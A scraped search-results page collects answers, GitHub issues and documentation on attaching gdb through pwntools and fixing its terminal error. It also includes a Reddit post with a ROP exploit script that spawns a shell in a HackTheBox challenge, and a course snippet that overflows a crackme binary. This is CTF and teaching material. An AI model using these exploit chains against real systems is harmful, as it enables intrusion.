You can use the pwnlib.gdb to interface with gdb.

You can use the gdb.attach() function: From the docs:

bash = process('bash')

# Attach the debugger
gdb.attach(bash, '''
set follow-fork-mode child
break execve
continue
''')

# Interact with the process
bash.sendline('whoami')

or you can use gdb.debug():

# Create a new process, and stop it at 'main'
io = gdb.debug('bash', '''
# Wait until we hit the main executable's entry point
break _start
continue

# Now set breakpoint on shared library routines
break malloc
break free
continue
''')

# Send a command to Bash
io.sendline("echo hello")

# Interact with the process
io.interactive()

The pwntools template contains code to get you started with debugging with gdb. You can create the pwntools template by running pwn template ./binary_name > template.py. Then you have to add the GDB arg when you run template.py to debug: ./template.py GDB.

If you get [ERROR] Could not find a terminal binary to use., you might need to set context.terminal before you use gdb.

If you're using tmux, the following will automatically open up a gdb debugging session in a new horizontally split window:
context.terminal = ["tmux", "splitw", "-h"]

And to split the screen with the new gdb session window vertically:
context.terminal = ["tmux", "splitw", "-v"]

(Note: I never got this part working, so idk if it'll work. Tell me if you get the gdb thing working).
(To use tmux, install tmux on your machine, and then just type tmux to start it. Then type python template.py GDB.

If none of the above works, then you can always just start your script, use ps aux, find the PID, and then use gdb -p PID to attach to the running process.

Answer from deuteriumoxide on Stack Overflow
🌐
GitHub
github.com › Gallopsled › pwntools › issues › 1727
wsl1 gdb failure · Issue #1727 · Gallopsled/pwntools
November 25, 2020 - Set context.terminal to your terminal.') File "/usr/local/lib/python3.8/site-packages/pwnlib/log.py", line 424, in error raise PwnlibException(message % args) pwnlib.exception.PwnlibException: Could not find a terminal binary to use.
Author   Gallopsled
🌐
GitHub
github.com › microsoft › WSL › issues › 4775
WSL2 does not provide a suitable console binary to open a new console window in · Issue #4775 · microsoft/WSL
December 19, 2019 - >>> gdb.debug('./bf') [x] Starting local process '/usr/bin/gdbserver' [+] Starting local process '/usr/bin/gdbserver': pid 2239 [*] running in new terminal: /usr/bin/gdb -q "./bf" -x "/tmp/pwn5cwax1eg.gdb" [ERROR] Could not find a terminal binary to use. Set context.terminal to your terminal.
Author   microsoft
Discussions

using gdb.attach, no shell is opened, even if pwntools say it
Hi, I'm trying to spawn a gdb in a new terminal. I'm using urxvtc, but tested same problem with xterm or lxterminal. Here is my code: #!/usr/bin/env python2 from pwn import * context.termin... More on github.com
🌐 github.com
12
August 25, 2017
Different behaviour when debugging in gdb vs. pwntools
I think by default gdb disables ASLR while pwntools does not. You hardcoded your libc base address so that would explain why it segfaults. Usually you have to leak an address from libc and find libc base using it. To find which libc version runs on the remote you could leak a couple of addresses and input them into libc database More on reddit.com
🌐 r/securityCTF
3
5
December 19, 2022
Unanswered 'pwntools' Questions - Stack Overflow
Stack Overflow | The World’s Largest Online Community for Developers More on stackoverflow.com
🌐 stackoverflow.com
Kate with Konsole as terminal on Windows
The things we take for granted in KDE. What's next ? A real file browser like Dolphin ? More on reddit.com
🌐 r/kde
35
63
March 10, 2023
Top answer
1 of 1
16

You can use the pwnlib.gdb to interface with gdb.

You can use the gdb.attach() function: From the docs:

bash = process('bash')

# Attach the debugger
gdb.attach(bash, '''
set follow-fork-mode child
break execve
continue
''')

# Interact with the process
bash.sendline('whoami')

or you can use gdb.debug():

# Create a new process, and stop it at 'main'
io = gdb.debug('bash', '''
# Wait until we hit the main executable's entry point
break _start
continue

# Now set breakpoint on shared library routines
break malloc
break free
continue
''')

# Send a command to Bash
io.sendline("echo hello")

# Interact with the process
io.interactive()

The pwntools template contains code to get you started with debugging with gdb. You can create the pwntools template by running pwn template ./binary_name > template.py. Then you have to add the GDB arg when you run template.py to debug: ./template.py GDB.

If you get [ERROR] Could not find a terminal binary to use., you might need to set context.terminal before you use gdb.

If you're using tmux, the following will automatically open up a gdb debugging session in a new horizontally split window:
context.terminal = ["tmux", "splitw", "-h"]

And to split the screen with the new gdb session window vertically:
context.terminal = ["tmux", "splitw", "-v"]

(Note: I never got this part working, so idk if it'll work. Tell me if you get the gdb thing working).
(To use tmux, install tmux on your machine, and then just type tmux to start it. Then type python template.py GDB.

If none of the above works, then you can always just start your script, use ps aux, find the PID, and then use gdb -p PID to attach to the running process.

🌐
GitHub
github.com › Gallopsled › pwntools › blob › dev › pwnlib › util › misc.py
pwntools/pwnlib/util/misc.py at dev · Gallopsled/pwntools
log.error('Could not find terminal binary %r. Set context.terminal to your terminal.' % terminal)
Author   Gallopsled
🌐
GitHub
github.com › Gallopsled › pwntools › issues › 1016
using gdb.attach, no shell is opened, even if pwntools say it · Issue #1016 · Gallopsled/pwntools
August 25, 2017 - Hi, I'm trying to spawn a gdb in a new terminal. I'm using urxvtc, but tested same problem with xterm or lxterminal. Here is my code: #!/usr/bin/env python2 from pwn import * context.terminal = "urxvtc" r = process("./test") gdb.attach(r...
Author   Gallopsled
🌐
Allthingsreversed
allthingsreversed.io › 20200609-making-pwnlib-gdb-attach-work-under-wsl2.html
Making pwnlib.gdb.attach work under WSL2 | allthingsreversed.io
June 9, 2020 - My first idea was to pass wsl.exe to this property, with additional option -e to indicate that we want to execute the gdb command. [code] context.terminal = [‘wsl.exe’,’-e’]
🌐
Icode
icode.best › i › 32920542413449
[ERROR] Could not find a terminal binary to use. Set context.terminal to your terminal.问题的解决方案-爱代码爱编程
背景使用ssh连接远程服... find a terminal binary to use. Set context.terminal to your terminal.解决方案是在代码的gdb.attach前添加一行代码,指定使用哪个terminal。context.terminal = ['tmux','splitw',' [ERROR] Could not find a terminal binary ...
🌐
Its304
its304.com › article › weixin_36711901 › 103737735
[ERROR] Could not find a terminal binary to use. Set context.terminal to your terminal报错的解决办法(亲测有效!)_胖胖的飞象的博客-程序员宅基地 - 程序员宅基地
一、问题描述在通过ssh连接服务器,在命令行界面进行pwntools的实验中,在调用gdb进行debug时会报这样一个错[ERROR] Could not find a terminal binary to use. Set context.terminal to your terminal,如下图所示其中部分实验代码如下:from pwn import *sh = pr..._context.terminal
Find elsewhere
🌐
Pianshen
pianshen.com › article › 66152768958
[ERROR] Could not find a terminal binary to use. Set context.terminal to your terminal.问题的解决方案 - 程序员大本营
Could not open a connection to your authentication agent · 成功解决Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX AVX2 · 彻底解决:Your CPU supports instructions that this TensorFlow binary was not compiled to use: AVX2 · VNC: Failed to execute default Terminal Emulator (Input/output error)
🌐
pwntools
docs.pwntools.com › en › dev › context.html
pwnlib.context — Setting runtime variables — pwntools 5.0.0dev documentation
defaults = {'adb_host': 'localhost', 'adb_port': 5037, 'arch': 'i386', 'aslr': True, 'binary': None, 'bits': 32, 'buffer_size': 4096, 'cache_dir_base': '/home/docs/.cache', 'cyclic_alphabet': b'abcdefghijklmnopqrstuvwxyz', 'cyclic_size': 4, 'debugger': 'auto', 'delete_corefiles': False, 'device': None, 'disable_corefiles': False, 'encoding': 'auto', 'endian': 'little', 'gdb_binary': '', 'gdbinit': '', 'kernel': None, 'local_libcdb': '/var/lib/libc-database', 'log_console': <_io.TextIOWrapper name='<stdout>' mode='w' encoding='utf-8'>, 'log_file': <pwnlib.context._devnull object>, 'log_level': 20, 'newline': b'\n', 'noptrace': False, 'os': 'linux', 'proxy': None, 'randomize': False, 'rename_corefiles': True, 'signed': False, 'ssh_session': None, 'terminal': (), 'throw_eof_on_incomplete_line': None, 'timeout': pwnlib.timeout.maximum, 'windbg_binary': '', 'windbgx_binary': ''}[source]
🌐
parzelsec
parzelsec.de › posts › speed-up-your-exploits
parzelsec | Speed up your binary exploits! An introduction to gef and pwntools
from pwn import * context.terminal = ['tmux', 'splitw', '-v'] sh = process("/path/to/binary") sh.sendline("someinput") oneline = sh.recvline(timeout=2) gdb.attach(sh)
🌐
Reddit
reddit.com › r/securityctf › different behaviour when debugging in gdb vs. pwntools
r/securityCTF on Reddit: Different behaviour when debugging in gdb vs. pwntools
December 19, 2022 -

I'm trying myself at the HackTheBox Binary challenge "htb-console".
It's a simple ROP challenge where you have to inject a 0x30 byte payload into an char buf[0x10]. Buf is at $rbp-0x10.

I chose to use gadgets from the libc in use by the elf (I just noticed that this might not work on the remote but lets just pretend it does).

When manually patching the stack in gdb with the system call, pop_rdi gadget etc. everything worked fine but when trying to do the exact same with pwntools I get a segfault. I also tried to attach gdb through pwntools and noticed that in the attached session the stack looked like it was correctly injected but I couldn't dereference any of the libc gadget addresses (SEGFAULT).

I feel like it's crucial to understand why the the exploit segfaults although it's the exact same binary running on the exact same system.

Here is the exploit file:

from pwn import *

context.terminal = ["terminator", "-e"]
sh = process("./htb-console")
# sh = gdb.debug(
#     "./htb-console",
#     """
# b *0x401395
# c
# """,
# )

buf_len = 0x10
# All these addresses work in gdb
libc_base = 0x007FFFF7DB1000
system = 0x401040
pop_rdi = 0x23835 + libc_base
bin_sh = 0x198031 + libc_base
ret = 0xF6C10 + libc_base

payload = b"A" * buf_len
payload += struct.pack("<Q", pop_rdi)
payload += struct.pack("<Q", bin_sh)
payload += struct.pack("<Q", ret)
payload += struct.pack("<Q", system)

# save payload
with open("payload.bin", "wb") as f:
    f.write(payload)

sh.sendlineafter(b">> ", b"flag")
sh.sendlineafter(b"Enter flag: ", payload)
sh.interactive()

I know that I can use p64() instead of struct.pack

Thanks in advance

🌐
Stack Overflow
stackoverflow.com › questions › tagged › pwntools
Unanswered 'pwntools' Questions - Stack Overflow
I'm trying to debug some linux system binaries with pwntools and gdb, but I seem to be unable to set my desired environment variables for the process: from pwn import * elf = ELF("/usr/bin/su&...
🌐
Agr0 Hacks Stuff
agrohacksstuff.io › posts › pwntools-tricks-and-examples
Pwntools Tricks and Examples | Agr0 Hacks Stuff
September 12, 2024 - Additionally, the context tells pwntools how you prefer to have your local setup, which includes the ability to open and attach a gdb debugging window alongside your interactive window. You can specify the context you want, or you can have pwntools inspect the binary in question automatically.
🌐
pwntools
docs.pwntools.com › en › stable › context.html
pwnlib.context — Setting runtime variables — pwntools 4.15.0 documentation
defaults = {'adb_host': 'localhost', 'adb_port': 5037, 'arch': 'i386', 'aslr': True, 'binary': None, 'bits': 32, 'buffer_size': 4096, 'cache_dir_base': '/home/docs/.cache', 'cyclic_alphabet': b'abcdefghijklmnopqrstuvwxyz', 'cyclic_size': 4, 'delete_corefiles': False, 'device': None, 'encoding': 'auto', 'endian': 'little', 'gdb_binary': '', 'gdbinit': '', 'kernel': None, 'local_libcdb': '/var/lib/libc-database', 'log_console': <_io.TextIOWrapper name='<stdout>' mode='w' encoding='utf-8'>, 'log_file': <pwnlib.context._devnull object>, 'log_level': 20, 'newline': b'\n', 'noptrace': False, 'os': 'linux', 'proxy': None, 'randomize': False, 'rename_corefiles': True, 'signed': False, 'ssh_session': None, 'terminal': (), 'throw_eof_on_incomplete_line': None, 'timeout': pwnlib.timeout.maximum}[source]
🌐
Medium
medium.com › @zeshanahmednobin › title-a-beginners-guide-to-pwntools-aaf56fc62e0a
A beginners guide to pwntools. [Pwntools](https://github.com/Gallopsled… | by NobinPegasus | Medium
November 15, 2023 - So we write(if the binary filename is chal): ... # or context.binary = “./chal” # setting the context automatically tells pwntools to run that specific binary.
🌐
Readthedocs
python3-pwntools.readthedocs.io › en › latest › context.html
pwnlib.context — Setting runtime variables — pwntools 2.2.1 documentation
ContextType.defaults = {'noptrace': False, 'aslr': True, 'proxy': None, 'binary': None, 'os': 'linux', 'randomize': False, 'bits': 32, 'log_level': 20, 'signed': False, 'arch': 'i386', 'kernel': None, 'endian': 'little', 'log_file': <pwnlib.context._devnull object>, 'timeout': 1048576.0, 'device': None, 'terminal': None, 'newline': '\n'}[source]¶
🌐
Gts3
tc.gts3.org › cs6265 › 2020 › tut › tut03-02-pwntools.html
Tut03-2: Writing Exploits with Pwntools - CS6265: Information Security Lab
#!/usr/bin/env python2 # import all modules/commands from pwn library from pwn import * # set the context of the target platform # arch: i386 (x86 32bit) # os: linux context.update(arch='i386', os='linux') # create a process p = process("./crackme0x00") # send input to the program with a newline char, "\n" # cyclic(50) provides a cyclic string with 50 chars p.sendline(cyclic(50)) # make the process interactive, so you can interact # with the proces via its terminal p.interactive() [Task] Hijack its control flow to 0xdeadbeef by using ... Our plan is to invoke a shell by hijacking this control flow. Before doing this, let's check what kinds of security mechanisms are applied to that binary.